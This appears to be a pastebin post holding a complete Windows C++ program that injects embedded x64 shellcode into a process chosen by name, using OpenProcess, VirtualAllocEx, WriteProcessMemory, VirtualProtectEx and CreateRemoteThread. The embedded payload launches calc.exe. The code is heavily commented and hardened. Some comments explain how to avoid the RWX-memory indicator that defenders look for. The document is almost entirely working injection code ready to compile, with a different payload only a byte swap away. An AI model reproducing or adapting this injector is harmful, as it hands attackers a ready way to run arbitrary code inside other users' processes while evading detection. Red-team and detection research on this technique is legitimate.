wirehack7

Inject shellcode into process

Sep 6th, 2023
#include <windows.h>
#include <TlHelp32.h>

#include <stdio.h>
#include <cstdlib>
#include <cstring>
#include <iostream>
#include <string>
  6.  
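// Classic remote-thread injection: OpenProcess -> VirtualAllocEx -> WriteProcessMemory
// -> VirtualProtectEx -> CreateRemoteThread. Intended for processes you are authorized
// to test against.
//
// pid: target process id. The embedded payload is 64-bit code (REX.W-prefixed
//      instructions), so both this injector and the target must be x64.
//
// Terminates the program with exit status 1 on any failed step. The original only
// bailed out when OpenProcess failed; a failed allocation or write fell through to
// CreateRemoteThread with a NULL / unwritten address.
void inject(int pid) {
    // Position-independent x64 payload. Its NOT-encoded immediates decode to "WinExec"
    // and "calc.exe": it resolves WinExec through the PEB loader list and launches
    // calc.exe as a harmless proof of execution.
    unsigned char shellcode[] =
        "\x48\x31\xff\x48\xf7\xe7\x65\x48\x8b\x58\x60\x48\x8b\x5b\x18\x48\x8b\x5b\x20\x48\x8b\x1b\x48\x8b\x1b\x48\x8b\x5b\x20\x49\x89\xd8\x8b"
        "\x5b\x3c\x4c\x01\xc3\x48\x31\xc9\x66\x81\xc1\xff\x88\x48\xc1\xe9\x08\x8b\x14\x0b\x4c\x01\xc2\x4d\x31\xd2\x44\x8b\x52\x1c\x4d\x01\xc2"
        "\x4d\x31\xdb\x44\x8b\x5a\x20\x4d\x01\xc3\x4d\x31\xe4\x44\x8b\x62\x24\x4d\x01\xc4\xeb\x32\x5b\x59\x48\x31\xc0\x48\x89\xe2\x51\x48\x8b"
        "\x0c\x24\x48\x31\xff\x41\x8b\x3c\x83\x4c\x01\xc7\x48\x89\xd6\xf3\xa6\x74\x05\x48\xff\xc0\xeb\xe6\x59\x66\x41\x8b\x04\x44\x41\x8b\x04"
        "\x82\x4c\x01\xc0\x53\xc3\x48\x31\xc9\x80\xc1\x07\x48\xb8\x0f\xa8\x96\x91\xba\x87\x9a\x9c\x48\xf7\xd0\x48\xc1\xe8\x08\x50\x51\xe8\xb0"
        "\xff\xff\xff\x49\x89\xc6\x48\x31\xc9\x48\xf7\xe1\x50\x48\xb8\x9c\x9e\x93\x9c\xd1\x9a\x87\x9a\x48\xf7\xd0\x50\x48\x89\xe1\x48\xff\xc2"
        "\x48\x83\xec\x20\x41\xff\xd6";
    // sizeof() counts the string literal's trailing NUL as well; the extra byte is harmless.
    const SIZE_T payload_len = sizeof(shellcode);

    // Least privilege: ask only for the rights this sequence needs rather than
    // PROCESS_ALL_ACCESS. It is also the set CreateRemoteThread documents as required.
    const DWORD access = PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION |
                         PROCESS_VM_OPERATION | PROCESS_VM_READ | PROCESS_VM_WRITE;
    HANDLE proc = OpenProcess(access, FALSE, static_cast<DWORD>(pid));
    if (proc == NULL) {
        // Could be "no such pid" or "access denied"; GetLastError tells them apart.
        printf("[-] OpenProcess(%d) failed (error %lu)\n", pid, GetLastError());
        std::exit(1);
    }
    printf("[+] PID opened\n");

    // Allocate writable-but-not-executable memory first and flip it to RX only after
    // the write (W^X). An RWX private region is a well-known injection indicator and
    // is never needed here.
    LPVOID remote = VirtualAllocEx(proc, NULL, payload_len, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
    if (remote == NULL) {
        printf("[-] VirtualAllocEx failed (error %lu)\n", GetLastError());
        CloseHandle(proc);
        std::exit(1);
    }
    // %p: the old "0x%08x" truncated the 64-bit address on x64 builds.
    printf("[+] Allocated virtual memory: %p\n", remote);

    SIZE_T written = 0;
    if (!WriteProcessMemory(proc, remote, shellcode, payload_len, &written) || written != payload_len) {
        printf("[-] WriteProcessMemory failed (error %lu, %zu/%zu bytes)\n", GetLastError(), written, payload_len);
        // Don't leave a partially written region behind in the target.
        VirtualFreeEx(proc, remote, 0, MEM_RELEASE);
        CloseHandle(proc);
        std::exit(1);
    }
    printf("[+] Shellcode written to memory\n");

    DWORD old_protect = 0;
    if (!VirtualProtectEx(proc, remote, payload_len, PAGE_EXECUTE_READ, &old_protect)) {
        printf("[-] VirtualProtectEx failed (error %lu)\n", GetLastError());
        VirtualFreeEx(proc, remote, 0, MEM_RELEASE);
        CloseHandle(proc);
        std::exit(1);
    }

    HANDLE thread = CreateRemoteThread(proc, NULL, 0,
                                       reinterpret_cast<LPTHREAD_START_ROUTINE>(remote),
                                       NULL, 0, NULL);
    if (thread == NULL) {
        printf("[-] CreateRemoteThread failed (error %lu)\n", GetLastError());
        VirtualFreeEx(proc, remote, 0, MEM_RELEASE);
        CloseHandle(proc);
        std::exit(1);
    }
    // Success here only means the thread was created; whether the payload ran to
    // completion is not observed. The region is deliberately NOT freed: the new
    // thread executes from it.
    printf("[+] Shellcode executed!\n");

    CloseHandle(thread);  // the original leaked this handle
    CloseHandle(proc);
}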
  49.  
// Writes the one-line usage banner to stdout.
// programName: the executable's basename, as derived by main() from argv[0].
void help(const std::string& programName) {
    const std::string banner = "usage: " + programName + " ProcessName\n";
    fputs(banner.c_str(), stdout);
}
  53.  
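// Walks a Toolhelp process snapshot and returns the id of the first process whose
// executable name matches processName (case-insensitive, via _wcsicmp), or 0 when
// nothing matches or the snapshot cannot be taken. 0 is the Idle process and never a
// user process, so callers can test the result directly.
//
// If several processes share the name, the first one in snapshot order wins; there
// is no way to select a specific instance through this function.
//
// Uses the explicit wide-character Toolhelp types (PROCESSENTRY32W / Process32FirstW /
// Process32NextW). The original used the TCHAR variants, whose szExeFile is only a
// WCHAR array when UNICODE is defined, so the wide-string compare failed to build in
// a non-UNICODE configuration.
int GetProcessIdByName(const std::wstring& processName) {
    HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (snapshot == INVALID_HANDLE_VALUE) {
        return 0;
    }

    int pid = 0;
    PROCESSENTRY32W entry{};
    entry.dwSize = sizeof(entry);  // must be set before the first Process32FirstW call

    if (Process32FirstW(snapshot, &entry)) {
        do {
            // Compare directly against the fixed-size buffer; no temporary wstring needed.
            if (_wcsicmp(entry.szExeFile, processName.c_str()) == 0) {
                pid = static_cast<int>(entry.th32ProcessID);
                break;
            }
        } while (Process32NextW(snapshot, &entry));
    }

    CloseHandle(snapshot);
    return pid;
}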
  78.  
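// Entry point: `<program> ProcessName` looks up the named process and injects into it.
// Exit status: 0 on success or when usage is printed, 1 when no process by that name
// is running (inject() itself exits with 1 on any injection failure).
int main(int argc, char* argv[]) {
    // Check argc before touching argv[1]: with argc == 0 (possible via exec with an
    // empty argv) argv[1] is out of bounds, and argv[0] may be NULL.
    if (argc < 2 || argv[1] == NULL) {
        std::string fullPath(argv[0] ? argv[0] : "");
        size_t lastSlashPos = fullPath.find_last_of("/\\");
        std::string programName = (lastSlashPos == std::string::npos)
                                      ? fullPath
                                      : fullPath.substr(lastSlashPos + 1);
        help(programName);
        return 0;
    }

    // Byte-wise widening: exact for ASCII names. Non-ASCII bytes are zero-extended,
    // not transcoded from the console code page (use MultiByteToWideChar if needed).
    const char* arg = argv[1];
    std::wstring targetProcessName(arg, arg + std::strlen(arg));

    int pid = GetProcessIdByName(targetProcessName);
    if (pid == 0) {
        // Previously a miss fell through to inject(0), which then failed inside
        // OpenProcess with a misleading message; report the real cause here.
        printf("[-] No running process named '%s'\n", arg);
        return 1;
    }

    inject(pid);
    return 0;
}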